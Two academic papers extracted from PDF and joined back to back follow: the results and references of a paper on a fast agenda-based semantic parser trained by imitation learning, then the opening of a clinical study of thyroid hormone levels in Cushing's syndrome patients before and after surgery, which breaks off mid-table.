1000, and L1 regularization strength λ = 10−5). We evaluated our semantic parser using the re- ward of the predictions, i.e., average F1 score on predicted vs. true entities over all test examples.7 9.1 Main Results Table 1 provides our key result comparing the fixed-order parser (FIXEDORDER) and our proposed agenda-based parser (AGENDAIL). In all subse- quent tables, Train, Dev., and Test denote train- ing, development and test accuracies, |Act.| denotes 7We use the official evaluation script from http:// www-nlp.stanford.edu/software/sempre/. http://www-nlp.stanford.edu/software/sempre/ http://www-nlp.stanford.edu/software/sempre/ Test Train |Act.| |Feat.| Time FIXEDORDER 49.6 60.6 18,127 18,127 1,782 AGENDAIL 49.7 61.1 1,346 1,814 291 Table 1: Test set results for the standard fixed-order parser (FIXEDORDER) and our new agenda-based parser (AGENDAIL), which substantially reduces parsing time and the number of parsing actions at no cost to accuracy. System Authors Acc. YV14 Yao and Van-Durme (2014) 35.4 BCFL13 Berant et al. (2013) 35.7 BDZZ14 Bao et al. (2014) 37.5 BWC14 Bordes et al. (2014) 39.2 BL14 Berant and Liang (2014) 39.9 YDZR14 Yang et al. (2014) 41.3 BWC14+ BL14 Bordes et al. (2014) 41.8 WYWH14 Wang et al. (2014) 45.3 WYWH14 Wang et al. (2014) 45.3 YCHG15 Yih et al. (2015) 52.5 FIXEDORDER this work 49.6 AGENDAIL this work 49.7 Table 2: Results on the WEBQUESTIONS test set. the average number of parsing actions (pops from agenda in AGENDAIL and derivations placed on chart in FIXEDORDER) per utterance, |Feat.| de- notes the average number of featurized derivations per utterance, and Time is average parsing time in milliseconds. We found that AGENDAIL is 6x faster than FIXE- DORDER, performs 13x fewer parsing actions, and reduces the number of featurized derivations by an order of magnitude, without loss of accuracy. Table 2 presents test set results of our systems, compared to recently published results. We note that most systems perform question answering with- out semantic parsing. Our fixed-order parser, FIXE- DORDER, and agenda-based parser, AGENDAIL, obtain an accuracy of 49.6 and 49.7 respectively. This improves accuracy compared to all previous systems, except for a recently published semantic parser presented by Yih et al. (2015), whose accu- racy is 52.5. We attribute our accuracy improvement compared to previous systems to the new features and changes to the model, as we discuss below. BCFL13 also used a fixed-order parser, but ob- tained lower performance. The main differences be- tween the systems are that (i) our model includes new features (Section 8) combined with L1 regular- ization, (ii) we use the Freebase search API rather than string matching, and (iii) our grammar gener- Algorithm Dev. |Act.| |Feat.| Time AGENDAIL 48.0 1,421 1,912 214 FIXEDORDER 49.1 18,259 18,259 1,972 AGENDA 45.9 6,211 6,320 419 FIXED+AGENDA 47.1 6,281 6,615 775 α = 1000 47.8 11,279 11,279 1,216 α = 100 35.6 3,858 3,858 174 α = 10 27.0 1,604 1,604 78 p+w θ 43.3 1,706 2,121 238 p+c θ 36.8 3,758 4,278 358 pθ 1.2 12,302 15,524 1,497 -BINARYANDLEMMA 40.5 1,561 2,110 167 Table 3: Development set results for variants of AGENDAIL. ates a larger space of derivations. 9.2 Analysis To gain insight into our system components, we per- form extensive experiments on the development set. Comparison with fixed-order parsing. Figure 8 compares accuracy, speed at test time, and number of derivations for AGENDAIL and FIXEDORDER. For AGENDAIL, we show both the number of derivations popped from the agenda, as well as num- ber of derivations scored, which is slightly higher due to scored derivations on the agenda. We ob- serve that for small beam sizes, AGENDAIL sub- stantially outperforms FIXEDORDER. This is since AGENDAIL exploits small beams more efficiently in intermediate parsing states. For large beams perfor- mance is similar. In terms of speed and number of derivations, we see that AGENDAIL is dramatically more efficient than FIXEDORDER: with beam size 200–400, it is roughly as efficient as FIXEDORDER with beam size 10–20. For the chosen beam size (K = 200), AGENDAIL is 9x faster than FIXE- DORDER. For K = 1, performance is poor for AGENDAIL and zero for FIXEDORDER. This highlights the in- herent difficulty of mapping to logical forms com- pared to more shallow tasks, as maintaining just a single best derivation for each parsing state is not sufficient. A common variant on beam parsing is to replace the fixed beam size K with a threshold α, and prune any derivation whose probability is at least α times smaller than the best derivation in that state (Zhang et al., 2010; Bodenstab et al., 2011). We imple- mented this baseline and compared it to AGENDAIL 1 10 20 50 100 200 400 beam size 0 10 20 30 40 50 a c c u ra c y FixedOrder AgendaIL 1 10 20 50 100 200 400 beam size 0.0 0.5 1.0 1.5 2.0 2.5 3.0 3.5 4.0 ti m e ( se c ) FixedOrder AgendaIL 1 10 20 50 100 200 400 beam size 0 5 10 15 20 25 30 # d e ri v a ti o n s (t h o u sa n d s) FixedOrder AgendaIL (scored) AgendaIL (popped) Figure 8: Comparing AGENDAIL and FIXEDORDER for various beam sizes (left: accuracy, middle: parsing time at test time in seconds, right: number of thousands of derivations scored and popped). The x-axis is on a logarithmic scale. and FIXEDORDER in Table 3. We see that for α = 1000, we get a faster algorithm, but a minor drop in performance compared to FIXEDORDER. However, this baseline still featurizes 6x more derivations and is 6x slower than AGENDAIL. Impact of learning. The AGENDA baseline uses an agenda-based parser to approximate the gradients of (2). That is, we update parameters as in FIXE- DORDER, but search for K root derivations using the agenda-based parser, described in Algorithm 1 (where we pop the highest scoring derivation). We observe that AGENDA featurizes 3x more deriva- tions compared to AGENDAIL, and results in a 2.1 drop in accuracy. This demonstrates the importance of explicitly learning to choose correct actions dur- ing intermediate stages of parsing. Since on the development set, FIXEDORDER outperformed AGENDAIL by 1.1 points, we im- plemented FIXED+AGENDA, where a fixed-order parser is used at training time, but an agenda-based parser is used at test time. This parser featurized 3.5x more derivations compared to AGENDAIL, is 3.5x slower, and has slightly lower accuracy. Recall that AGENDAIL samples a history from p+cwθ , that is, using local reweighting and history compression. Table 3 shows the impact of sampling from p+wθ (local reweighting), p +c θ (history compres- sion), and directly from pθ, which reduces to policy gradient. We observe that sampling from pθ directly according to policy gradient results in very low ac- curacy, as this produces derivations with zero re- ward most of the time. Both local reweighting and history compression alone improve accuracy (local Acc. |Feat.| Time Tr. Dev. Tr. Dev. Tr. Dev. � = 102 56.4 46.7 1,650 2,121 1,159 345 � = 10−1 59.5 47.0 2,043 1,890 1,425 279 � = 10−2 61.0 48.0 2,600 1,912 1,830 214 � = 10−3 61.4 48.5 3,063 1,740 2,110 220 NOSTREAM 60.0 47.6 4,049 4,931 3,155 293 Table 4: Accuracy, number of featurized derivations, and pars- ing time for both the training set and development set when varying the value of the tolerance parameter �. reweighting is more important), but both perform worse than AGENDAIL. Impact of lazy agenda. We now examine the con- tribution of the lazy agenda. Note that the lazy agenda affects training time much more than test time for two reasons: (a) at test time we only need to pop the highest scoring derivation, and the overhead of a priority queue only grows logarithmically with the size of the agenda. During training, we need take a full pass over the agenda when sampling, and thus the number of items on the agenda is important; (b) at test time we never unroll derivation streams, only pop the highest scoring derivation (see Section 7). In brief, using the lazy agenda results in a 1.5x speedup at training time. To understand the savings of the lazy agenda, we vary the value of the tolerance parameter �. When � is very high, we will never unroll derivation streams, because for all derivation streams U ≤ �|G+| (Section 7). This will be fast, but sampling could be inaccurate. As � decreases, we unroll more derivations. We also compared to the NOSTREAM baseline, where the agenda holds derivations rather than derivation streams. AgendaIL: FixedOrder: what currency does jamaica accept ? 2 91 2 127 10 2 0 85 0 20 2 2 249 0 0 186 4 2 14 0 400 what currency does jamaica accept ? 5 486 524 8, 714 59 5 3 211 1, 099 761 3 3 1, 519 403 3 604 419 3 159 3 558 Figure 9: Number of derivations in every chart cell for the utterance “what currency does jamaica accept?”. AGENDAIL reduces the number of derivations in chart cells compared to FIXEDORDER. Table 4 shows the results of these experiments. Naturally, the number of featurized derivations in training increases as � decreases. In particular, NOSTREAM results in a 2.5x increase in number of featurized derivations compared to no unrolling (� = 102), and 1.5x increase compared to � = 10−2, which is the chosen value. Similarly, average train- ing time is about 1.5x slower for NOSTREAM com- pared to � = 10−2. Accuracy does not change much for various val- ues of �. Even when � = 102, accuracy decreases by only 1.8 points compared to � = 10−3. Unexpect- edly, NOSTREAM yields a slight drop in accuracy. Feature ablation. Table 3 shows an ablation test on the new feature template we introduced that conjoins binaries and lemmas during bridging (- BINARYANDLEMMA). Removing this feature tem- plate substantially reduces accuracy compared to AGENDAIL, highlighting the importance of learning new lexical associations during training. Example. As a final example, Figure 9 shows typ- ical parse charts for AGENDAIL and FIXEDORDER. AGENDAIL generates only 1,198 derivations, while FIXEDORDER constructs 15,543 derivations, many of which are unnecessary. In summary, we demonstrated that training an agenda-based parser to choose good parsing actions through imitation learning dramatically improves ef- ficiency and speed at test time, while maintaining comparable accuracy. 10 Discussion and Related Work Learning. In this paper, we sampled histories from a distribution that tries to target the reference derivation d∗ whenever possible. Work in imita- tion learning (Abbeel and Ng, 2004; Daume et al., 2009; Ross et al., 2011; Goldberg and Nivre, 2013) has shown that interpolating with the model (corre- sponding to smaller β) can improve generalization. We were unable to improve accuracy by annealing β from 1000 to 0, so understanding this dynamic re- mains an open question. Parsing. In this paper, we avoided computing K derivations in each chart cell using an agenda and learning a scoring function for choosing agenda items. A complementary and purely algorithmic so- lution is lazy K-best parsing (Huang and Chiang, 2005), or cube growing (Huang and Chiang, 2007), which do not involve learning or an agenda. Simi- lar to our work, cube growing approximates the best derivations in each chart cell in the case where fea- tures do not decompose Work in the past attempted to speed up inference using a simple model that is trained separately and used to prune the hypotheses considered by the main parsing model (Bodenstab et al., 2011; FitzGerald et al., 2013). We on the other hand speed up inference by training a single model that learns to follow good parsing actions. Work in agenda-based syntactic parsing (Klein and Manning, 2003; Pauls and Klein, 2009) focused on A* algorithms where each derivation has a prior- ity based on the derivation score (inside score), and a completion estimate (outside score). Good esti- mates for the outside score result in a decrease in the number of derivations. Currently actions depend on the inside score, but we could add features based on chart derivations to provide “outside” information. Adding such features would present computational challenges as scores on the agenda would have to be updated as the agenda and chart are modified. Semantic parsing has been gaining momentum in recent years, but still there has been relatively lit- tle work on developing faster algorithms, especially compared to syntactic parsing (Huang, 2008; Kum- merfeld et al., 2010; Rush and Petrov, 2012; Lewis and Steedman, 2014). While we have obtained sig- nificant speedups, we hope to encourage new ideas that exploit the structure of semantic parsing to yield better algorithms. Reproducibility. All code,8 data, and experiments for this paper are available on the CodaLab platform at https://www.codalab.org/worksheets/ 0x8fdfad310dd84b7baf683b520b4b64d5/. Acknowledgments We thank the anonymous reviewers and the action editor, Jason Eisner, for their thorough reviews and constructive feedback. We also gratefully acknowl- edge the support of the DARPA Communicating with Computers (CwC) program under ARO prime contract no. W911NF-15-1-0462. References P. Abbeel and A. Ng. 2004. Apprenticeship learning via inverse reinforcement learning. In International Conference on Machine Learning (ICML). M. Auli and A. Lopez. 2011. Efficient CCG parsing: A* versus adaptive supertagging. In Association for Computational Linguistics (ACL). J. Bao, N. Duan, M. Zhou, and T. Zhao. 2014. Knowledge-based question answering as machine translation. In Association for Computational Linguis- tics (ACL). J. Berant and P. Liang. 2014. Semantic parsing via para- phrasing. In Association for Computational Linguis- tics (ACL). J. Berant, A. Chou, R. Frostig, and P. Liang. 2013. Semantic parsing on Freebase from question-answer pairs. In Empirical Methods in Natural Language Pro- cessing (EMNLP). N. Bodenstab, A. Dunlop, K. Hall, and B. Roark. 2011. Beam-width prediction for efficient context-free pars- ing. In Association for Computational Linguistics (ACL), pages 440–449. A. Bordes, S. Chopra, and J. Weston. 2014. Question answering with subgraph embeddings. In Empirical Methods in Natural Language Processing (EMNLP). Q. Cai and A. Yates. 2013. Large-scale semantic parsing via schema matching and lexicon extension. In Asso- ciation for Computational Linguistics (ACL). 8Our system uses the SEMPRE toolkit (http://nlp. stanford.edu/software/sempre). S. A. Caraballo and E. Charniak. 1998. New figures of merit for best-first probabilistic chart parsing. Compu- tational Linguistics, 24:275–298. K. Chang, A. Krishnamurthy, A. Agarwal, H. Daume, and J. Langford. 2015. Learning to search better than your teacher. arXiv. J. Clarke, D. Goldwasser, M. Chang, and D. Roth. 2010. Driving semantic parsing from the world’s re- sponse. In Computational Natural Language Learn- ing (CoNLL), pages 18–27. H. Daume, J. Langford, and D. Marcu. 2009. Search- based structured prediction. Machine Learning, 75:297–325. J. Duchi, E. Hazan, and Y. Singer. 2010. Adaptive subgradient methods for online learning and stochas- tic optimization. In Conference on Learning Theory (COLT). N. FitzGerald, Y. Artzi, and L. S. Zettlemoyer. 2013. Learning distributions over logical forms for refer- ring expression generation. In Empirical Methods in Natural Language Processing (EMNLP), pages 1914– 1925. Y. Goldberg and J. Nivre. 2013. Training determinis- tic parsers with non-deterministic oracles. Transac- tions of the Association for Computational Linguistics (TACL), 1. Google. 2013. Freebase data dumps (2013-06- 09). https://developers.google.com/ freebase/data. L. Huang and D. Chiang. 2005. Better k-best parsing. In Proceedings of the Ninth International Workshop on Parsing Technology, pages 53–64. L. Huang and D. Chiang. 2007. Forest rescoring: Faster decoding with integrated language models. In Associ- ation for Computational Linguistics (ACL). L. Huang. 2008. Forest reranking: Discriminative pars- ing with non-local features. In Association for Com- putational Linguistics (ACL). J. Jiang, A. Teichert, J. Eisner, and H. Daume. 2012. Learned prioritization for trading off accuracy and speed. In Advances in Neural Information Processing Systems (NIPS). M. Kay. 1986. Algorithm Schemata and Data Struc- tures in Syntactic Processing. Readings in Natural Language Processing. D. Klein and C. Manning. 2003. A* parsing: Fast ex- act viterbi parse selection. In Human Language Tech- nology and North American Association for Computa- tional Linguistics (HLT/NAACL). J. Krishnamurthy and T. Mitchell. 2012. Weakly super- vised training of semantic parsers. In Empirical Meth- ods in Natural Language Processing and Computa- tional Natural Language Learning (EMNLP/CoNLL), pages 754–765. https://www.codalab.org/worksheets/0x8fdfad310dd84b7baf683b520b4b64d5/ https://www.codalab.org/worksheets/0x8fdfad310dd84b7baf683b520b4b64d5/ http://nlp.stanford.edu/software/sempre http://nlp.stanford.edu/software/sempre https://developers.google.com/freebase/data https://developers.google.com/freebase/data J. Kummerfeld, J. Roesner, T. Dawborn, J. Haggerty, J. Curran, and S. Clark. 2010. Faster parsing by supertagger adaptation. In Association for Computa- tional Linguistics (ACL). T. Kwiatkowski, L. Zettlemoyer, S. Goldwater, and M. Steedman. 2010. Inducing probabilistic CCG grammars from logical form with higher-order unifi- cation. In Empirical Methods in Natural Language Processing (EMNLP), pages 1223–1233. T. Kwiatkowski, E. Choi, Y. Artzi, and L. Zettlemoyer. 2013. Scaling semantic parsers with on-the-fly ontol- ogy matching. In Empirical Methods in Natural Lan- guage Processing (EMNLP). M. Lewis and M. Steedman. 2014. A* CCG parsing with a supertag-factored model. In Empirical Methods in Natural Language Processing (EMNLP). P. Liang, M. I. Jordan, and D. Klein. 2011. Learning dependency-based compositional semantics. In As- sociation for Computational Linguistics (ACL), pages 590–599. P. Liang. 2013. Lambda dependency-based composi- tional semantics. arXiv. C. D. Manning, M. Surdeanu, J. Bauer, J. Finkel, S. J. Bethard, and D. McClosky. 2014. The Stanford CoreNLP natural language processing toolkit. In ACL system demonstrations. C. Matuszek, N. FitzGerald, L. Zettlemoyer, L. Bo, and D. Fox. 2012. A joint model of language and per- ception for grounded attribute learning. In Inter- national Conference on Machine Learning (ICML), pages 1671–1678. A. Pauls and D. Klein. 2009. K-best A* parsing. In As- sociation for Computational Linguistics (ACL), pages 958–966. S. Ross, G. Gordon, and A. Bagnell. 2011. A reduction of imitation learning and structured prediction to no- regret online learning. In Artificial Intelligence and Statistics (AISTATS). A. Rush and S. Petrov. 2012. Vine pruning for efficient multi-pass dependency parsing. In Human Language Technology and North American Association for Com- putational Linguistics (HLT/NAACL). R. Sutton, D. McAllester, S. Singh, and Y. Mansour. 1999. Policy gradient methods for reinforcement learning with function approximation. In Advances in Neural Information Processing Systems (NIPS). S. Tellex, T. Kollar, S. Dickerson, M. R. Walter, A. G. Banerjee, S. J. Teller, and N. Roy. 2011. Understand- ing natural language commands for robotic navigation and mobile manipulation. In Association for the Ad- vancement of Artificial Intelligence (AAAI). Z. Wang, S. Yan, H. Wang, and X. Huang. 2014. An overview of Microsoft deep QA system on Stan- ford WebQuestions benchmark. Technical report, Mi- crosoft Research. Y. W. Wong and R. J. Mooney. 2007. Learning syn- chronous grammars for semantic parsing with lambda calculus. In Association for Computational Linguis- tics (ACL), pages 960–967. M. Yang, N. Duan, M. Zhou, and H. Rim. 2014. Joint re- lational embeddings for knowledge-based question an- swering. In Empirical Methods in Natural Language Processing (EMNLP). X. Yao and B. Van-Durme. 2014. Information extraction over structured data: Question answering with Free- base. In Association for Computational Linguistics (ACL). W. Yih, M. Chang, X. He, and J. Gao. 2015. Semantic parsing via staged query graph generation: Question answering with knowledge base. In Association for Computational Linguistics (ACL). M. Zelle and R. J. Mooney. 1996. Learning to parse database queries using inductive logic programming. In Association for the Advancement of Artificial Intel- ligence (AAAI), pages 1050–1055. L. S. Zettlemoyer and M. Collins. 2005. Learning to map sentences to logical form: Structured classifica- tion with probabilistic categorial grammars. In Uncer- tainty in Artificial Intelligence (UAI), pages 658–666. L. S. Zettlemoyer and M. Collins. 2007. Online learn- ing of relaxed CCG grammars for parsing to logical form. In Empirical Methods in Natural Language Pro- cessing and Computational Natural Language Learn- ing (EMNLP/CoNLL), pages 678–687. Y. Zhang, B. Ahn, S. Clark, C. V. Wyk, J. R. Curran, and L. Rimell. 2010. Chart pruning for fast lexicalised- grammar parsing. In International Conference on Computational Linguistics (COLING). work_kjydoa2mwfclpe5ldim7btjkni ---- 8:8 1176–1185B Xiang, R Tao et al. Thyroid functions in Cushing’s syndrome RESEARCH A study of thyroid functions in patients with Cushing’s syndrome: a single-center experience Boni Xiang1,*, Ran Tao1,*, Xinhua Liu1, Xiaoming Zhu1, Min He1, Zengyi Ma2, Yehong Yang1, Zhaoyun Zhang1, Yiming Li1, Zhenwei Yao3, Yongfei Wang2 and Hongying Ye1 1Department of Endocrinology and Metabolism, Huashan Hospital, Fudan University, Shanghai, China 2Department of Neurosurgery, Huashan Hospital, Fudan University, Shanghai, China 3Department of Radiology, Huashan Hospital, Fudan University, Shanghai, China Correspondence should be addressed to H Ye: yehongying@huashan.org.cn *(B Xiang and R Tao contributed equally to this work) Abstract Objective: The aim of this study was to evaluate thyroid functions in Cushing’s syndrome (CS), the dynamic changes of thyroid hormones and antithyroid antibodies in Cushing’s disease (CD) pre- and postoperatively. Design and methods: This is a retrospective study enrolling 118 patients with CS (102 CD, 10 adrenal CS and 6 ectopic adrenocorticotropic syndrome (EAS)). Thyroid functions (thyroid-stimulation hormone (TSH), T3, free T3 (FT3), T4 and free T4 (FT4)) were measured in all CS at the time of diagnosis and in all CD 3 months after transsphenoidal pituitary tumor resection. Postoperative hormone monitoring within 3 months was conducted in 9 CD patients completing remission. Twenty-eight remitted CD patients experienced hormone and antithyroid antibody evaluation preoperatively and on the 3rd, 6th and 12th month after surgery. Results: TSH, T3 and FT3 were below the reference range in 31%, 69% and 44% of the 118 CS patients. Remitted CD patients (81/102) had significantly higher TSH (P = 0.000), T3 (P = 0.000) and FT3 (P = 0.000) than those in the non-remission group (21/102). After remission of CD, TSH, T3 and FT3 showed a significant increase, with a few cases above the reference range. By 12 months, most CD patients’ thyroid functions returned to normal. Thyroid hormones (including TSH, T3 and FT3) were negatively associated with serum cortisol levels both before and after surgery. No significant changes of antithyroid autoantibodies were observed. Conclusions: TSH, T3 and FT3 are suppressed in endogenous hypercortisolemia. After remission of CD, TSH, T3 and FT3 increased significantly, even above the reference range, but returned to normal 1 year after surgery in most cases. Antithyroid antibodies did not change significantly after remission of CD. Introduction Cushing’s syndrome (CS) comprises diverse manifestations resulting from chronic exposure to excess glucocorticoids. The incidence is 0.2–5.0 per million people per year. Approximately 80% of endogenous CS is adrenocorticotrophin (ACTH)-dependent (1), and 20% is ACTH-independent. Pituitary corticotroph adenoma (Cushing’s disease (CD)) is the most common cause (2), followed by primary unilateral adrenal adenomas and ectopic adrenocorticotropic syndrome (EAS). The clinical presentation includes reddish purple striae, -19-0309 Key Words f Cushing’s syndrome f Cushing’s disease f cortisol f thyroid hormones f antithyroid antibodies Endocrine Connections (2019) 8, 1176–1185 ID: 19-0309 8 8 This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0309 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:22PM via free access mailto:yehongying@huashan.org.cn https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0309 https://ec.bioscientifica.com B Xiang, R Tao et al. Thyroid functions in Cushing’s syndrome 1177 PB–10 8:8 plethora, proximal muscle weakness and metabolic disorders (central obesity, hypertension, diabetes mellitus and dyslipidemia). The inhibitory effect of hypercortisolemia on the hypothalamic–pituitary axis is most commonly characterized by menstrual abnormalities in adults and growth retardation in children. Besides, the thyroid hormone changes in hypercortisolemia have been reported since 1952. Fredrickson et al. described that massive doses of cortisone acetate decreased iodine-131 (I131) accumulation in the thyroid of euthyroid patients (3). Dexamethasone administration (16 mg daily for 2.5 days) was reported to reduce the thyroid-stimulating hormone (TSH) and free T3 (FT3) secretion and blunted the TSH response to thyrotropin-releasing hormone (TRH) (4). Regarding endogenous hypercortisolemia, a study of three patients with adrenal CS showed similar results (5). Kuku reported that serum TSH response to TRH was impaired in eight patients with CD. The impairment was relieved after a pituitary implant of 198Au (6). Primary cortisol deficiency was reported concomitant with high TSH and low FT3. After cortisone administration, TSH returned to normal. However, serum cortisol and TSH showed no significant correlation (7). In 2013, Tamada et al. first reported ‘hyperthyroidism’ in two CS patients after surgery due to ‘syndrome of inappropriate secretion of TSH’ (SITSH) associated with the insufficient replacement of hydrocortisone (HC) (8). Free T3 and TSH were normalized after a HC dose increase (8). Then, the same group investigated the clinical course in eight CS patients and found that free T3 levels were above the reference range in 75% of patients up to 6 months after surgery, and all returned to normal within 1 year (9). They suggested that cured CS patients might develop high T3 or T4 with normal or elevated TSH (8). Endogenous CS is an uncommon disease. There has not yet been a large sample in which the clinical course of thyroid hormone changes was studied before and after remission of endogenous CS. In clinical practice, because of the lack of knowledge about this condition, some CS patients’ thyroid functions may be mistaken as evidence of hypothyroidism or hyperthyroidism after surgery and even led to the medication of antithyroid drugs. The aim of our study was to evaluate the thyroid functions of patients with CS, compare the hormone levels in patients with different etiologies, and investigate the clinical course of fluctuations of thyroid hormones in patients with CD pre- and postoperatively. Patients and methods Patients This study included 118 CS patients who were hospitalized in the Department of Endocrinology and Metabolism of Huashan Hospital between January 2013 and April 2016. They were diagnosed with either CD (n = 102, median age: 36.0 years, range 13–63 years, female/male: 90/12), adrenal CS (n = 10, median age: 36.5 years, range 21–57 years, female/male: 8/2) or EAS (n = 6, median age: 49.0 years, range 22–72 years, female/male: 5/1). All subjects had a comprehensive clinical evaluation by the same group of endocrinology specialists and all patients with CD underwent primary resection at our institution by the same surgeon. None of the patients had a history of thyroid diseases. Methods Data on clinical findings, laboratory findings, imaging findings, treatment and outcome were obtained. All CD patients (microadenomas: 88/102, macroadenomas: 14/102) underwent transsphenoidal pituitary tumor resection (TSS) through a microscope or endoscope. Remission was defined as morning serum cortisol levels lower than 5.0 μg/dL within 7 days of selective tumor resection (10). The cortisone replacement began after remission, and cortisone dosage prescribed was based on the serum cortisol levels and the symptoms. Thyroid hormones (TSH, T3, FT3, T4 and free T4 (FT4)) and serum cortisol were measured in all 118 patients before treatment. In all 102 CD patients, thyroid hormones and serum cortisol were measured 3 months after surgery. The hormones were measured before surgery and 1 day, 2 weeks, 1 month, 2 months and 3 months after surgery in nine CD patients completing remission. In 28 remitted CD patients, the hormones and antithyroid autoantibodies were measured 3, 6 and 12 months after surgery. Hormonal assays Samples were obtained at 08:00 h before any medication. Serum thyroid hormones (TSH, T3, FT3, T4 and FT4) and antithyroid autoantibodies (TPO-Ab and ATG) were assessed by immunoenzymometric assay method (ADVIA Centaur®; Siemens Healthcare Diagnostics Inc.). Serum cortisol was measured by chemiluminescent enzyme immunoassay (cobas® e 602, Roche Diagnostics). This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0309 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:22PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0309 https://ec.bioscientifica.com B Xiang, R Tao et al. Thyroid functions in Cushing’s syndrome 11788:8 Statistical analyses Normal distributed continuous variables were expressed as mean values ± standard deviation (s.d.). T-test was used to compare means between groups. Simple linear regression coefficients and multiple regression analysis were used to examine the correlation among parameters. SPSS 20.0 (SPSS) was used. A two-tailed P value <0.05 was considered statistically significant. Ethical approval The study was approved by the ethics committee of Huashan Hospital attached to Fudan University (#KY2017- 422). Consent has been obtained from each patient or subject after full explanation of the purpose and nature of all procedures used. Results At the time of diagnosis, TSH, T3, FT3, T4 and FT4 levels were below the reference range in 31%, 69%, 44%, 11% and 19% of 118 CS patients, respectively (Table 1). None of the patients had elevated thyroid hormones. In 33 (28%) patients, low TSH with low T3 or T4 was found. Regarding different etiologies, serum cortisol in patients with EAS was higher than that in adrenal CS (44.1 ± 17.1 μg/dL vs 30.1 ± 7.8 μg/dL, P = 0.04) and CD (44.1 ± 17.1 μg/dL vs 29.4 ± 10.1 μg/dL, P = 0.001). FT3 and FT4 in EAS were also the lowest, with significance when comparing with those in CD (FT3: 2.93 ± 0.76 nmol/L vs 3.68 ± 0.68 pmol/L, P = 0.009; FT4: 11.4 ± 1.6 nmol/L vs 13.9 ± 2.8 pmol/L, P = 0.035) (Table 2). Three months after surgery, 81/102 CD patients developed remission. The median dose of cortisone acetate for post-surgery and 3rd-month replacement treatment were separately 50.0 mg/day (0~100 mg/day) and 25.0 mg/day (0~75.0 mg/day) in remission group. Twenty of the 81 remitted patients needed no more cortisone replacement on the third month. Postoperative TSH (2.42 ± 1.73 mIU/L vs 1.07 ± 0.82 mIU/L, P = 0.000), T3 (2.09 ± 0.77 nmol/L vs 1.08 ± 0.31 nmol/L, P = 0.000), FT3 (5.37 ± 1.37 pmol/L vs 3.70 ± 0.66 pmol/L, P = 0.000), T4 (93.1 ± 23.3 nmol/L vs 80.2 ± 18.4 nmol/L, P = 0.000) were higher than those before surgery (Fig. 1 and Table 3). TSH in 11.1% (9/81), T3 in 4.9% (4/81) and FT3 in 17.3% (14/81) were above the reference range 3 months after surgery in the remission group. However, FT4 slightly decreased after surgery (before surgery: 13.8 ± 2.8 pmol/L, 3 months after surgery: 12.9 ± 2.7 pmol/L, P = 0.012). Moreover, elevated T3, FT3 and FT4 with nonsuppressed TSH were seen in 12/81 (14.8%) cases. We investigated the clinical parameters between the remission and non-remission groups (Fig. 1 and Table 3). Before surgery, serum cortisol and thyroid hormones showed no difference between the two groups. However, 3 months after surgery, TSH (P = 0.000), T3 (P = 0.000) and FT3 (P = 0.000) became significantly higher in the remission group. T4 of the two groups showed no difference (P = 0.668). FT4 levels in the remission group were lower than those in the non-remission group (12.9 ± 2.7 pmol/L vs 14.8 ± 2.7 pmol/L, P = 0.004). Correlation analyses between levels of serum cortisol and thyroid hormones were conducted in the 112 CS patients before surgery and the 102 CD patients 3 months after surgery. Significant negative correlations between thyroid hormones and serum cortisol both before and after surgery were found (Table 4). We also analyzed the correlations between tumor size and preoperative serum cortisol/thyroid functions in all the CD patients (n = 102), but the association turned out insignificant. Besides, the correlation among several parameters, including thyroid hormones, serum cortisol levels, age, gender, BMI and tumor size were analyzed using simple linear regression analysis (Table 5). It revealed marked negative correlations between serum cortisol levels and thyroid function parameters including TSH (P = 0.001), T3 (P = 0.000) and FT3 (P = 0.000) before surgery. In addition, BMI was positively associated with T3 (P = 0.005) and FT3 (P = 0.047) and age were inversely associated with FT3 (P = 0.015) and FT4 (P = 0.025). However, after surgery, the only variable significantly affecting thyroid hormones was serum cortisol (in postoperative analyses, the variable ‘tumor size’ was excluded). For the nine remitted patients whose thyroid functions were closely monitored within 3 months, the Table 1 Characteristics of patients with Cushing’s syndrome before treatment. Cushing’s syndrome Reference range Number 118 / Age, years 36.7 (13.0–72.0) / Female/male 103/15 / Serum cortisol (µg/dL) 27.9 (11.7–63.4) / TSH (mIU/L) 0.75 (0.03–4.55) 0.550~4.780 T3 (nmol/L) 1.02 (0.43–3.26) 1.23~3.39 T4 (nmol/L) 75.9 (25.8–131.2) 54.0~174.0 FT3 (pmol/L) 3.58 (1.27–5.33) 3.50~6.50 FT4 (pmol/L) 13.21 (6.36–21.82) 11.5~22.7 Data are median (minimum–maximum). This work is licensed under a Creative Commons Attribution-NonCommercial-NoDerivatives 4.0 International License. https://doi.org/10.1530/EC-19-0309 https://ec.bioscientifica.com © 2019 The authors Published by Bioscientifica Ltd Downloaded from Bioscientifica.com at 04/06/2021 04:58:22PM via free access https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://creativecommons.org/licenses/by-nc-nd/4.0/ https://doi.org/10.1530/EC-19-0309 https://ec.bioscientifica.com B Xiang, R Tao et al. Thyroid functions in Cushing’s syndrome 1179 PB–10 8:8 median dose of cortisone acetate for post-surgery, second week, first month, second month and third-month replacement treatment were 50.0 mg/day (0~75.0 mg/day), 50.0 mg/day (0~50.0 mg/day), 25.0 mg/day (0~50.0 mg/day), 25.0 mg/day (0~50.0 mg/day) and 25.0 mg/day (0~50.0 mg/day). Two of the nine patients received no cortisone replacement after surgery (Fig. 2). Among them, we found that TSH started to rise since the first day after surgery (the increase became statistically remarkable since the second week and the significance lasted till the third month). FT3 and T3 became lower on the first day and then rose up markedly. The changes of T4 and FT4 Table 2 Comparative study between CD, adrenal adenoma and EAS. CD Adrenal adenoma EAS Reference range n 102 10 6 / Age (years) 36.0 (13.0, 63.0) 36.5 (21.0, 57.0) 49.0 (22.0, 72.0) / Male/female 12/90 2/8 1/5 / Serum cortisol (µg/dL) 29.4 ± 10.1 30.1 